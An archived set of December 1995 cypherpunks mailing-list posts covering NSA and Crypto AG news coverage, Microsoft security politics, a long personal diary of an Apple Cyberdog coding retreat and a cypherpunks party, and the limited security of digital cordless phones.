The difference between science and the fuzzy subjects is that science
requires reasoning, while those other subjects merely require
scholarship.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff A. Gehlbach" <jeffg@hiwaay.net>
Date: Sun, 17 Dec 1995 07:02:27 +0800
To: cypherpunks@toad.com
Subject: Re: .PWL Spin
Message-ID: <9512160238.AA15186@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 02:01 PM 12/15/95 -0600, you wrote:
>According to rumor, anonymous-remailer@shell.portal.com said:
>> On Sat, 9 Dec 1995, Joel McNamara wrote:
   <SNIP>
>> What would make a University less secure than a corporation??
>
>1) Usually more net connected hosts.
>2) Lack of adequate sysadmin attention/knowledge.
>3) Vague and poorly enforced site security policies.

IMHO Microsoft has no concern about the security of any university; educational institutions will standardize on whatever OS the majority of their students are familiar with (=Windows whatever).  

No, the big priority in Redmond is winning (and keeping) corporate customers.  A corporation can standardize around whatever the management likes.  A large Virginia-based metals corporation recently standardized on the M$ Office suite with little regard to the hundreds of users who had already effectively entrenched with WordPerfect.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 Dec 1995 14:18:31 +0800
To: cypherpunks@toad.com
Subject: RES_ist
Message-ID: <199512160216.VAA29258@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-15-95. NYPaper, crypto-bizarrely:

   "Extremist Army Group at War With U.S. Policy."

      It is not known how large the underground group is but
      the Special Forces acknowledge the group's existence and
      says that it was not in violation of any regulations.
      Its newsletter, The Resister, available on the Internet,
      said it favored "strict constitutionalism, isolationism,
      laissez-faire capitalism, individual rights, limited
      government and republicanism," and opposed "statism,
      liberalism, tribalism, socialism, collectivism,
      internationalism, democracy, altruism, pull politics and
      the New World Order."

   RES_ist  (10 kb)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sat, 16 Dec 1995 13:38:17 +0800
To: cypherpunks@toad.com
Subject: More Balto Sun on the NSA: Infowar
Message-ID: <v02130500acf7d6f1eacc@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



The last part of the Baltimore Sun's series of articles on the
NSA arrived today. It concentrated upon the prospect for a
bloodless "Infowar." The article began with a hypothetical
attack beginning on January 17, 2001, the tenth anniversary of
the US bombing of Baghdad. In the attack, bad, computer related
things happen like  stock markets crash and all of the money is
drained from the accounts of the sailors in the US Navy. The
article then uses this as a beginning for a long contemplation
of the NSA's future.

Many of the details are well-known to cypherpunks. The NSA is
poking around with drug interdiction, economic intelligence and
computer security. The Russian linguists are being retrained.
Etc. The article ends with a story told by Senator Rudman of NH.
He says that 100 years ago, the houses were wood and we needed
fire stations on every corner. Now, they're made of brick and
concrete and  come with sprinkler systems. The Fire Union might
argue that you still need a fire station on every corner, he
told the reporter, but that's not necessarily true.

So, perhaps Clipper is a form of job insurance? True perfect
security would not only hurt SIGINT, but it would remove the
need for crypto firemen. If you want to have a system that gives
some people access and not other people, then you need a lot of
folks to stand around, sign forms and generally make sure that
everything is running smoothly. Strong cryptography is
automation. GAK requires a large bureaucracy to administer it.

The article also has some anecdotes about how the agency
protected US firms abroad. One company was alerted that its
European competitor was bribing the Latin American officials who
were choosing the winning bid. Also, when the Peso collapsed,
the US negotiators had access to some information that the
Mexican government wasn't being as forthcoming as they should
have been about the country's assets. They used this information
in negotiations.

--Peter Wayner

You can purchase the complete articles from the Baltimore Sun by
dialing 410-332 6962. The price is $3.95.

(See my second post for more info on an earlier article about Crypto AG).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 17 Dec 1995 07:02:35 +0800
To: cypherpunks@toad.com
Subject: Balto Sun Followup: Crypto AG a friend of Cypherpunks?
Message-ID: <v02130501acf7db56f315@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



In an earlier posting, I summarized an article in the Baltimore
Sun about the Swiss company Crypto AG that makes encryption
machines for the world market. The newspaper ran a follow up
article today (12/15/95) that discussed a two page statement
issued by Crypto AG. Some of the quotes from the statement that
made it into the Baltimore Sun article are:

   "Pure Invention"
   "old hearsay"
    "The allegations are not new at all and just repeat tales
which date back 25 or more years"
    [Crypto AG] "has no political ambitions or claims."

My favorite detail, however, was the hint that the rumors are a
"well conceived ploy" to harass a company that is making strong
crypto for independent countries. So maybe they're cypherpunks?

The rest of the Baltimore Sun article goes on to summarize why
the paper printed what it did. These include interviews with
apparently anonymous sources identified as "several former
Crypto engineers." These engineers told the Sun that they were
forced to make design changes by their boss based upon
"technical documents provided by mysterious visitors to the Zug
plant."

-Peter Wayner

If you care about this matter, you should dig up the original
article from the Baltimore Sun. $3.95. Dial 410-332 6962.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 16 Dec 1995 13:52:17 +0800
To: cypherpunks@toad.com
Subject: e$: Seven Days
Message-ID: <v02120d02acf7de724462@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

12/15/95
Boston, MA

Interesting things happened during seven days last week, which I spent
mostly on the road. The focus of the trip was almost entirely on e$ and
geodesic markets, so I thought I'd do a reprise of the "24 hours" post
here for fun.

Tuesday

Woke up at about 6 and thrashed the e-mail pile for about an hour. I'm
finding that I get up, do e-mail and then take a shower. Could trollhood
be far behind?  Usually, I have at least 100 messages in the mailbox
first thing in the morning. Almost all of this is not for me, about 95%
is e$pam fodder, of which 10% makes the cut. About 80% of the total is
still cypherpunks -- so, what else is new? The NetGAK fight dominates
all, and I get flamed by one of my subscribers about pumping so much of
it onto e$pam. I ask him to send the flame to the list, but nothing ever
happens. I figure that the more cogent NetGAK arguments deserve
e$pamming because of my oft-debated contention that digital commerce is
financial cryptography, and financial cryptography is a subset of
strong cryptography, and attempts by nation-states to regulate commerce,
and thus strong cryptography, are usually entertaining when they're not
dangerous. These days, I suppose Duncan Frissell would call GAK-attempts
entertaining, and Tim May would call it dangerous, and I fall in between
somewhere.

Sometimes, all of this reminds me of Barr Rosenberg, the popular 70's
analyst-of-stock-analysts who made a whole lot of mutual fund managers
feel much better about themselves and the efficient market hypothesis.
His point was that if they didn't try to beat the market every day of
their lives, there wouldn't be a market to beat. The best fund managers
did beat the market on a regular basis, just barely, and that was the
incentive for all the rest to try their hand at it. We all benefit as a
result. We can buy a mutual fund, or just buy an index fund, and for the
most part, we can be sure that the market will go up a reasonable annual
amount on some long term average.

I see progress against government interference in the net.market the
same way. Just one of us can't really do it, but if all of us chip away
at it, some of us more than others, then those "profits at the margin"
begin to add up to a trend of government cluefulness about economic
reality as far as geodesic markets on the net are concerned. One of the
biggest clues of all is that strong cryptography is the lynchpin
technology for any real peer-to-peer cash-settlement economy. They just
don't get that yet. They will. The market is efficient.

I get cleaned up, pack (always at the last minute, and always in a
hurry) call a cab and go down to the Harvard Club on Federal Street to
moderate the Digital Commerce Society of Boston luncheon. We had about
30 people and 3 no-shows, which is about par after three months of doing
this.

We also had about 10 new people, which is also par. Among them was a
sizable contingent from the financial community, which is good, because
I put the meeting in the middle of Boston's financial district on
purpose. We had people from State Street Bank's bond room, some people
from Fidelity Systems' advanced technology bunch, one guy from Mellon
Bank's advanced technology group, and someone from Lehman, who I believe
was another bond trader.

Rich Salz, from OSF, was the speaker, and he talked about financial
middleware for the internet. When I listen to someone like Rich, I'm
always reminded of just how much I *don't* know. Among other things,
Rich told the story about how someone had to fight tooth and nail to
keep people from putting URLs into Super Bowl ads, because the
net.infrastructure wouldn't pass the smoke test. Something about too
much demand if they advertised Madonna's lingerie for sale...

DCSB is growing nicely, I think. We've got speakers booked out until
next June, running the gamut from FSTC to Perry Metzger, we're keeping
our Harvard Club bill paid, and everyone looks happy to meet someone
else whose eyes don't glaze over when they talk about digital commerce
technology and its consequences.

The plane flight is boring, and I keep forgetting to get some kind of
battery brick for shipwright.com, my PowerBook 180. To top it off, I've
had it more or less plugged into the wall for a year, so the battery's
gone. So, I read Forbes, and then the Atlantic, and then after a plane
change in Chicago, I sleep until I get to San Jose, where Vinnie, a
friend of mine from Apple, and my equivalent of Hunter Thompson's Samoan
attorney, picks me up. I go crash on a futon in his living room, and
wake up way too early.

Wednesday.

After waking up at 4:30, downloading e-mail and thrashing it all into
food for Thumper, our ailing mail-server, I forestall trollhood one more
time and get cleaned up to go outside. This time, it's to go hang out
for three days at the Apple OpenDoc Cyberdog Coding Retreat, or
"Kitchen", as they say at Apple.

First, Vinnie takes me to his office at Apple Developer Technical
Support (DTS), by way of a triple espresso dumped into a large coffee
(Vinnie's version of a weightlifter's ephedrine stack, I suppose)  and a
rather large cholesterol-festival breakfast at the Apple cafeteria.

At Vinnie's office, I meet several of his workmates, including his
shooting buddy Jeff, who, along with Vinnie, takes failed hard drives
out to the shooting range periodically for durability testing. Jeff says
there's something satisfying about the sound of AK-47 fire ricocheting
off of the pride of Conner, Seagate or Quantum in the early evening
after a hard day's bug-hunting.

Vinnie, who got started messing around with computers when he was about
13, at MIT's AI lab in the early 70's, is also an ex-marine black-belt
who teaches handgun safety and marksmanship. He has one of those
humaniform target sheets pasted on his office window with tidy groupings
over the middle chest and forehead, the result of a field trip that
folks in DTS took one day to the range. After much arm-twisting, they
persuaded Vinnie to take a few shots himself, and he squeezed off the
above Glock magazine in about 8 seconds or so. That, the break-out
picture of the AK-47 on his wall, the business card that says "DTS
Sniper. One shot, One kill", and the Glock t-shirt with the rolled up
sleeves over a few too many muscles under hair that's buzz-cut a little
bit short, makes most liberals and other statists a little nervous. The
small oval Oakley reflective sunglasses don't hurt, I suppose. I have
to say that someone actually pointed all this out to me, a little
later in the week. I'd never noticed it, really. I've known Vinnie for
about 5 years now, and I think about Vinnie the same way that someone
talked about Dick Butkus once. "Kind of a teddy bear with muscles." A
very *smart* teddy bear with muscles.

After taking the tour of DTS and meeting mostly normal people with the
exception of Vinnie and Jeff, well, mostly normal people, anyway, we
jumped into Vinnie's Toyota 4X4 with the firearm, punk band and
right-wing bumper stickers all over the rear window and went over to
Apple's City Center campus and the Cyberdog Kitchen.

We were greeted by Jim Black, who was running the Kitchen for Apple,
which consists primarily of 60 (for this kitchen, anyway, because of
CyberDog; normally it's about 20) people with Macs in front of them
trying to develop code in new environments for the first time. They do
this over the course of 3 days, from 8 in the morning to midnight or
later, punctuated by the occasional meal or presentation. Jim was the
guy who flew me out here, so I figure I have to pay attention to him.
Vinnie and John say relax, so I start paying attention to the kitchen
itself, including fooling around with the various Cyberdog "parts", or
objects.

Cyberdog itself is a really cool idea. Effectively, it's an
implementation of IBM's SOM object model for the internet. With
Cyberdog, you can encapsulate any function in a part, kind of like a
very small application on steroids. You can make parts like
web-browsers, or mailers, or ftp-parts. In other words, parts for all
the stuff you do on the net.  My, uh, part-icular interest in this was
the concept of OpenDoc and especially Cyberdog as "Geodesic" software,
which was the topic of another rant, which turned into an article, which
got me here at the Cyberdog kitchen.

More to the point, my interest in parts comes from the ease with which
one could do financial cryptography, and how developers of cyberdog
parts could sell them on the net, preferably on a direct-to-the-customer
basis, and for cash -- anonymous, of course;-). I had managed to get a
"seat", a Mac, in other words, so that someone who actually was
crypto-code-clueful could come in, and at least get up to speed on
Cyberdog, and go play with it elsewhere.

"Elsewhere", because of the ITARs of course. It seems that there were
foreign nationals in the room, and Apple legal was more than a little bit
concerned that something would be misconstrued somewhere in the bowels
of Blair House. Also, there's the interesting problem of crypto-hooks as
tantamount to crypto itself. I talked to more than one developer who
thought he had skirted the ITAR issue altogether, just by leaving
crypto APIs there for other people to use.  We had fun telling them all
about just how hard their tax dollars were working *against* them in
this regard.

Anyway, all this "elsewhere" stuff was just fine, because the person I
*could* get on such short notice, who was both crypto and OpenDoc
capable, was Dave Del Torto, who could only show up for one day.
However, in Dave I got cluefulness personified. Dave has done work for
Qualcomm on Eudora, Digicash on ecash, and was under NDA to Apple for
OpenDoc and Cyberdog already, and in addition, going to try to walk in
with what there was of the PGP 3.0 code. Also, there were at least two
well-respected Mac.Cypherpunks there working on code for their
respective employers, not to mention several crypto/e$ people from
Apple, all of whom were personally interested, and who will remain
nameless. I was pumped.

Playing around with the demo internet parts that Apple provided for
Cyberdog was fun. Rather than a monolithic application like Netscape
loading up when you start up a cyberdog part, you start up the part
itself, and nothing else. When your browser needs mail it calls your
mail part. When your newsreader needs to browse it calls your browser
part. Of course, they can all call crypto or e$ parts as they need to.
There's a history part that records where you were and what you did in
URLs, and there's a notebook part you can stick URLs into if you want to
keep them.

The coolest ah, part, about all of this is that every one of these parts
can be interchanged. It's also easy to see that if something gets
popular like web-browsing, and people keep adding features to browsers,
someone can come along and sell parts that do those features better than
the browser itself can do, like bookmark management, for instance, and
sell them separately. Feature creep dies in its tracks.  This process is
exactly the kind of "surfactant" effect that I had observed with the
internet, which dissolves information into more and more dispersed
pieces, and which had gotten me into all this trouble in the first place
with the rant and the InfoWorld article.

Couple this with the potential for geodesic markets on the net with e$,
particularly with digital cash and micropayment schemes, and I thought I
had something to say to these folks, which is why I was brought here to
speak in the first place. In an auditorium. With cameras and lights
and videotape. And an audience with 200 people in it. As I had never
actually done this before, I was feeling a little like Dustin Hoffman in
"Rain Man": "V-E-R-N, Vern..."

So, along about noon, we jump back into Vinnie's assault vehicle (by
granola-land standards, anyway) and we go to said auditorium, called
"Town Hall". There, I spoke about, according to my notes, <big intake of
breath> the books "Out of Control", and "Applied Cryptography", The rise
of the pyramid paradigm, Bucky (Fuller) and Pete (Huber), The net as a
geodesic and information surfactant, OpenDoc as geodesic software and
code surfactant, cypherpunks, strong cryptography, anonymity, the four
horsemen, digital cash and digital bearer certificates, chaotic
capital, Financial Cryptography for Dogs (Teaching Cyberdog to send you
money in the mail), and of course, Dissolving the entire status quo into
a cloud of self organized chaos. <exhale...>

All of which took 45 minutes of the hour and a half I was allotted.
Fortunately, about 15 minutes into the Q&A period, I was rescued by Eric
Hughes, who showed up with black cowboy hat (which is how you identify
those "black hat" cryptographers, I'm told), to answer all the hard
stuff. I was greatly pleased, not only to get bailed out, but also to
meet Eric, who I'd only talked to on the net until a week before, when
we had had an actual phone call to get his appearance here arranged.

Probably the most interesting thing for me was watching Eric handle the
guilty titters the audience got when he talked about the profit one gets
from money laundering. "It's immensely liberating when thinking about
this stuff to think like an illegal operative", he said. Meaning to me,
of course, that you're not trying to break the law, but that you're
trying to think about how markets work in their, er, extra-legal,
unregulated form. Since a very large part of financial cryptography is
about how to prevent being cheated in an on-line transaction without
recourse to the law and eventually physical force, Eric's spot-on about
this.

Another thing he said that got me to thinking was that the "foregone
alternative", or opportunity cost of removing advertising is equivalent
to the amount someone spends on sending you advertising. If, for
instance, an advertiser spends $1 to spam your mailbox, it's probably
going to have to be worth at least $1 for you to block him.

After my talk, Eric, Sameer (also in a black hat) and I were asked into
what turned out to be a brainstorming session with several people from
Apple and other places, who pumped us (mostly Eric, of course) about how
best to implement digital signatures as quickly and securely as possible
in the Mac OS, given that Apple's RSA-signatures-in-Powertalk idea isn't
getting very far. Maybe something will come of it, maybe not. Hope so.

After that, I went back to the Cyberdog Kitchen with Vinnie, where we
met Dave Del Torto. Dave and Vinnie thrashed Cyberdog, and I schmoozed
people and thrashed e$pam until dinner. After dinner, I went home to
Vinnie's and crashed at the ungodly hour of 8:30.

Thursday

I wake up at 6:30 this time, and, checking the bank, find out that a
wire from one of my sponsors for the e$ lists has arrived. Happy, Happy,
Joy, Joy. That makes two, and I'm looking for 2 more for the time being,
so send me e-mail, if you're interested, or check the web page at
http://thumper.vmeng.com/pub/rah/ for more details.

Speaking of poor thumper, we upgraded the web software to WebStar, but
the problem now is the list server, running on some freeware called
MacJordomo, which works for normal applications, but was giving us fits,
and crashing the server with annoying regularity. Vinnie got it
rebooted, and we made an appointment to go see thumper for some surgery
on Sunday afternoon up in Walnut Creek.

Vinnie and I pile into his truck, almost accidentally monster-truck
ourselves over someone with a no-fur vanity plate whose Tercel stops too
suddenly, and went to his office so he could get caught up a little bit,
after the obligatory triple espresso caffeine stack and vegetarian's
worst nightmare for breakfast. Vinnie says something about this being an
anabolic diet that weightlifters use. Actually, I started this about a
month ago, and it works so far. I've lost about 25 lbs, and have only
165 to go...

Vinnie, in his role as "Bob-handler", has negotiated a slot on the
speaking schedule at the Cyberdog kitchen so I can rant at the people I
came here to pay attention to in the first place, the people coding
dog-parts... Yes, there's a joke, and I'll tell it later.

So, I give a more Cyberdog-specific version of yesterday's talk for
those who missed it. I got assistance from the aforementioned Cyberdog
cypherpunks (Cypherdogs?... Nah...) on the uh, hard parts... The most
important thing I tried to get across was the idea of parts paying their
authors by mail. A part asks for money to be sent to the author, who
sends the part a signed operating certificate, which enables the part to
run.

After lunch, Vinnie and I get on the road for San Francisco, stopping
first for a pair of Lee Oskar harmonicas, in the key of A. I decide it's
time to teach Vinnie how to play cross-harp. So I teach him how to bend
a few notes while telling him about how I used to walk home from
Fidelity in Boston wearing my blue suit, red tie, white shirt, and
wingtips, walking into the sun, so I needed sunglasses, smoking a 45
minute Macanudo baseball bat, because I had enough time to smoke it, and
playing blues harp, because I could, and the walk was boring...

We're going to see a friend, who will also remain nameless for the time
being, and who has just set up shop on Market street. After swearing me
to secrecy, and swearing Vinnie to enforce my secrecy (good move that,
swear Vinnie to anything, and it happens), they tell all about what
they're up to, and it's big.  Very big. The more I think about it, the
bigger it gets, until finally I force myself to look out of the eighth
floor conference-room window, and down Market Street. Sure enough,
lumbering up from the waterfront is the Stay Puft Marshmallow Man,
straight out of Ghostbusters. I shake my head, and it goes away...

So our friend and some of his friends go to a hotel lobby, where Vinnie
gets to smoke a Cohiba for the first time, and then on to "Stars" for
dinner, and then home to sleep in Vinnie's living room. Bizzarre dreams
about the Marshmallow Man, drinking triple-espresso-in-black-coffee...

Friday

The last day of the CyberDog Kitchen.

People are rushing around to finish their demo Cyberdog parts before
show and tell this afternoon.

I thrash e$pam some more, and meet with Stephen Humphrey, a contractor
to Apple from Salt Lake City, who's writing a book on OpenDoc, and who
seemed to be Apple's front-line code resource person at the kitchen. We
talked about possible payment APIs for Cyberdog, and his forthcoming
book, which I'm writing the preface for, for which he's going to pay me
a few bucks in Mark Twain Bank's ecash, just so we can say we did it.

I also talked to Steven Roussey, of PartMerchant. He's developing a server
which will sell OpenDoc parts on the net directly to Cyberdog users as
they need them, and he's going to settle his transactions in ecash,
among other things. It turns out, he *is* writing a payment API for
Cyberdog, so that a part can hold the user up for money at periodic
intervals and send it to the developer, through PartMerchant initially,
but certainly in the long run, developers with permanent net presences
can use this same API to collect their revenues directly. To me, that
means a rather interesting scenario where copyrights and patents matter
much less because developers get paid for the code which is being
*used*, eventually maybe at runtime, and certainly at periodic
intervals, or at a flat rate, or whatever the market will bear. I
thanked him for all his efforts. Effusively.

After lunch, it was time to do a "show-and-tell" of the Cyberdog parts
that people had built in the past three days.

People had done all sorts of stuff, including various tweaks on the
reference Cyberdog parts to see if it could be done. The most important
thing for me was seeing Java run in an OpenDoc part. This meant several
things to me. The first is that I keep getting people telling me that
Java and OpenDoc are competitors. Quite obviously, that is not the case.
Java can run in any container, including OpenDoc containers. It also
means that if competition for Java comes along, OpenDoc can run that,
too. This also means that the need for monolithic applications to run
Java, like Netscape, or any wild fantasy of Microsoft, is nonexistent.

This becomes important because Macromind has a Java-equivalent, and it
proves that others will follow. Just download a part on the fly from the
PartMerchant, and you can run those scripting languages too.

To me, the whole idea of economies of scale  gets turned on its head in
this kind of "geodesic" environment. If someone likes Java, they can
write something better, and someone else will write a Cyberdog part to
handle it. If someone likes that part, they can write a better one, and
so on. This Darwinian, er, dog-eat-dog world can only lower software
prices, and make better software. The people who benefit are the small
developers, because they move, and can get paid, faster.

I look at Apple like the US in the early 19th century, letting people
homestead on the land by giving it to the people who develop it. Lincoln
had to do nothing but give away rights of way to the railroads to make a
transcontinental line a reality. Apple licences OpenDoc to developers as
cheaply as possible, maybe giving it away as much as possible, and all
these developers make Macs the platform of choice on the net, selling
more Macs and Mac-clones in the process, just like the homesteaders made
the land they moved onto more valuable, and eventually taxable. Only
this time, there is no pristine wilderness or native americans to abuse.
Cool.

Finally the dog-part joke. Someone, riffing on the BBEdit "It doesn't
suck" slogan said, "Cyberdog doesn't suck..." and someone in the crowd
finished the sentence with  "...it licks!", and someone else said,
"Because it can!". And then there was a massive "EEEEWWWWWWW" from
everyone else...

Now *that* was disgusting... Oh, well, they'd been working from 8 AM to
midnight plus for 2 days...


After the show and tell was over, the kitchen was over, but Vinnie and I
hung around for a while as people were packing up all the Macs Apple
provided for the kitchen. While chatting with some of the OpenDoc
evangelists, we talked about how OpenDoc, just like the net, was just
like this vast unexplored territory. I said that Lincoln built the
transcontinental rail road with  -- and the woman who was the division
head for all the OpenDoc evangelists finished my sentence and said "land
grants!" with the strangest smile on her face. I think I connected
there...

After that, Vinnie and I packed up and went over to his office, hung out
there while Vinnie did some of his own work, and then went out for
dinner with a bunch of DTS people.


Saturday

I wake up at a normal time. Vinnie and I go out to Gold's gym and thrash
weights with his buddy Ray from DTS, who's been working for Apple for 14
years and is, pound for pound, about the strongest guy I've ever seen.

After breakfast, the purchase of two boxes of Macanudo "Prince Phillip"
cigars, a visit to Rochester Big & Tall, and renting a tux for Vinnie
for the Apple Christmas party, we pick up Cynthia, who's Vinnie's
friend, and who, in addition to building the Apple OpenDoc website,
helped Vinnie clang trashcan lids together to get people into the
audience for my talk on Wednesday, not to mention asking pertinent
NetGAK questions of Eric during the talk itself.

Vinnie, Cynthia and I pile into her car and head out to a cypherpunks
party somewhere in the hills near Los Gatos. After missing the turnoff
twice in both directions, we finally arrive at a geodesic dome. Not
missing the irony of this, having just given a talk at Apple on
"Geodesic Software and Financial Cryptography for Dogs" I have to laugh
a bit.

This is an honest-to-goodness, straight out of the Whole-Earth Domebook,
back to the land, llamas-and-all geodesic dome, complete with naked
hippies in the hot tub. I come to the conclusion that this is going to
be a great party, even if I only know people from what they've written
on cypherpunks. I saw Sameer and Sandy Sandfort, who I had met earlier
in the week, and Eric, of course, who was holding court with Roger
Schlafly about patent esoterica when I came in. I saw Raph Levien, and
the guy (sorry, can't remember all names) who was working on PGP3, who
had a single paper copy of the PGP3 API to pass around, and Eric
peppered him uncomfortably with interface call questions, ending most of
Mr. PGP3's answers with "Oh, well, we'll wait until it's released, and
then we'll deal with it",  that is until someone let it be known that
the hot tub was in fact open for business. At that, Eric fairly
scampered out of there for the back porch, where the tub was.

A little later on, after I was introduced to "the guy who wrote the game
Gorp", who did something much more important later but I can't remember
what, I had fun just sitting there in a denim bean-bag chair, looking up
at the dome's ceiling, listening to people rant crypto for a while, with
Cynthia noticed that, besides broad-brimmed black hats, cryptographers
all have these Tolkien-wizard pointy goatees. Made me glad my attempts
at facial fur had been constantly interrupted by the need to "clean up
for company", me not being a real cryptographer and all...

One of the people I met was Mr. Weinstein from Netscape. We chatted for
a while, and I told him that he had probably won this year's Black Rhino
Ammunition Inc. "Mr. Kevlar" award for his service in the cause of
cypherpunkdom. He laughed. I didn't tell him that Black Rhino Ammunition
was a fictional company dreamed up by the gun lobby to get a rise out of
the Clinton administration, and that the Clinton administration had
risen so much that they had banned the fictional company's fictional
Kevlar-penetrating bullets... That, of course, was off-topic. ;-).

Vinnie broke out one of the boxes of baseball-bat-sized Macanudos, and
we proceeded to hang out on the back porch ourselves, killing insects
and gagging llamas with tobacco fumes. I offered some to the naked
hippies in the hot-tub, but they had better things to do than to stand
wet and naked on a cold back porch smoking cigars. Eventually Vinnie and
I were joined by three or four others, and their various frowning
spousal and virtual-spousal units. A good time was had by all, albeit a
little on the cold side, until Vinnie looks at my watch (Vinnie doesn't
wear a watch) and says "Oops. Time for the next party", and I went in to
get my Mac from behind the chair Eric was sitting in before he cornered
Mr. PGP3 and then galloped off to the hot tub.

This chair now had another guy sitting in it, and, as I had been doing
all evening,  I introduced myself, by way of retrieving my Powerbook. It
was Tim May.

I laughed, and shook his hand goodbye, which must have puzzled him a
bit, got my Mac from behind him, and split.  Tim May looks much
different in person than he does on the net. On the net, he's this
short, skinny-but-muscular, pushy guy with no beard who looks too young
for his age. In person, he's exactly the opposite on all counts. Gooo
figure.

We headed into San Jose and the house of one of three people at Apple
with the title of "Scientist". The guy who answered the door looked like
a biker. Actually, he was a biker, colors and all. He was also the
"Scientist", who had just achieved that appellation by working up through
the ranks from Vinnie's department, Developer Technical Support. A very
smart guy with an amazing collection of CDs (including the entire
DiMeola canon), early 60's Dodges and Ramblers, guitars (including a
1959 Stratocaster), and, of course, Harleys. He also had a very hairy
Persian cat, named Freddy, and whose full name wouldn't surprise me if
it was "Fat Freddy" of Fabulous Furry Freak Brothers fame...

So, after the birthday party's birthday person opened all her gifts,
Vinnie and Cynthia and I took off, leaving the remaining Macanudos
behind for our esteemed host. We expect his outside smoke breaks on the
Apple campus to take on the order of 45 minutes, while the cigars last,
anyway...

Sunday

Today's mission was to go to Walnut Creek, where both my in-laws and the
beleaguered e$ server thumper live.

After we had breakfast with Jeff, of hard-drive durability test fame,
who gave me all his old PowerBook 100-series batteries and chargers,
Vinnie and I went up to Walnut Creek. We had lunch with my
brother-in-law and nephew, who gave me warm regards from most of my
other in-laws, who all came down with the flu that week, ;-), exchanged
Christmas gifts right there in the Buttercup Diner, and then went on to
the AG Group, where thumper lives.

The AG group makes network monitoring software like Etherpeek and
Skyline, and one of Vinnie's friends, a founder there, had let us hang
thumper off of their internet feed. After thanking him for letting us
in, and for putting thumper up for the duration, and hearing *him* thank
his lucky stars he wasn't parasailing on Mt. Diablo this afternoon --
where the winds had just piped up to 70 mph -- we went into AG Group's
machine room and began to perform brain surgery on thumper. Thumper, who
started life as a Quadra 950 running httpd and Macjordomo, is now a
PowerMac 8100 running WebStar and, soon, ListStar. We munge around on it
remotely with Timbuktu, and, since we were having so much trouble
between AIMS and MacJordomo, we're going to drop in AutoBoot so we won't
have to have someone manually restart it for us.

We brought up ListStar, and, deciding that it was way too much work to
do that afternoon, brought it back down to prototype the e$ lists
remotely and then upload them later. So now, we're waiting for a break
in schedule so that we can do just that, sometime this week. I hope.

So, we went back to Vinnie's house, by way of Fry's to pick up a battery
brick, and Warehouse, to get the videos "The Decline of Western
Civilization", and "Dazed and Confused".  It seems that Vinnie wanted to
relive his lost youth on both counts. Cynthia came over, and she, Jim
(who's Vinnie's roommate), Vinnie and I ate pizza and watched Vinnie
fast-forward through most of "Decline", except for watching the "Fear"
segment twice, and then we actually watched all of "Dazed", which put a
lump in my throat, seeing as I was Lafayette HS, '77, and in Vinnie's
too, as he was Boston Latin '78. It seems this movie has cult status.
Has nostalgia arrived for 70's dopers and acid casualties? It seems to
have happened...

After that, I thrashed e$pam and went to bed.

Monday

Vinnie had to help with the Open Transport kitchen. I hung with Cynthia
for a while, and then we went down to the cafeteria, and met Guy
Kawasaki getting his breakfast. Cynthia introduced me to him, and he
gave me a "why should I know you?" look, but I did get to shake the
man's hand, which means now I never have to wash it. Ewwwwwww.

Finally, we went back to the Open Transport kitchen where Vinnie was
working, said bye to Vinnie, and Cynthia took me to the airport, put me
on the plane, and, as soon as we leveled off, I started writing this on
shipwright.com. The battery brick works great.

When I got home, I asked my wife how church was that morning. She said,
"Bob, it's Monday." Oh. Right. It's Monday...


Cheers,
Bob Hettinga


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNIti/gyLN8bw6ZVAQHzxwP/V1qCuwb5XAkyKxr3Tdkafwd/WcBhAKAb
NVXryVnChBa1DmmL6UA24ZVIeO3ELZkkYc5N+4e5qsG5zE0gIt00ZP0NXEpr8Xxl
AioYwTIvKt5sJKLzBb/uNxnivKuIU9zLwqJiJ4NwIzZDvfzUi9EdhPWV9Y42bQ5J
+rnQpWEMtpA=
=PXfA
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Sat, 16 Dec 1995 13:45:21 +0800
To: cypherpunks@toad.com
Subject: Re: Motorola Secure Phone
Message-ID: <9512160230.AA27216@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Sameer wrote
> 
> 	My AT&T 900 (or is it 9000?) MHz digital cordless phone says
> the same thing. I figure it uses a weak cryptosystem. There is
> something about key setup when you return the handset to the base.
> 	(The phone was $200, FWIW)
 
> Dan wrote: 
> > I saw a new cordless phone made by Motorola in a retail outlet today
> > that is supposedly "Secure from eavesdroppers."  I asked the
> > salespeople for more technical info, but they weren't very helpful. 
> > Does anyone have any information on this?  I didn't notice any "Not
> > for Export" stickers on the box, and the ITAR does cover
> > spread-spectrum technology.  So is it analog or digital?  Is it just
> > doing simple analog tricks, or is it encrypting a bitstream?  Clipper
> > maybe?  I doubt it.  Any info appreciated.
> > 						Dan

    I've also got an ATT 9000. It's one of the digital 900 MHz phones, and
has no encryption.  It claims extra security due to being digital - your
average 14 year old's scanner is analog only. 

    There's a bunch of frequencies. The frequency to use, and a
(fairly small, 16-bit?) security code, get reset when the receiver is
put on its stand. The code is used only for a handshake, so several
phones in the same area won't interfere by accident. It is not 
frequency agile - the same freq is used throughout the call. 

    It's a good phone - nice tone, long range, and it's secure
against jerks with scanners. Secure against serious eavesdroppers
it's not.

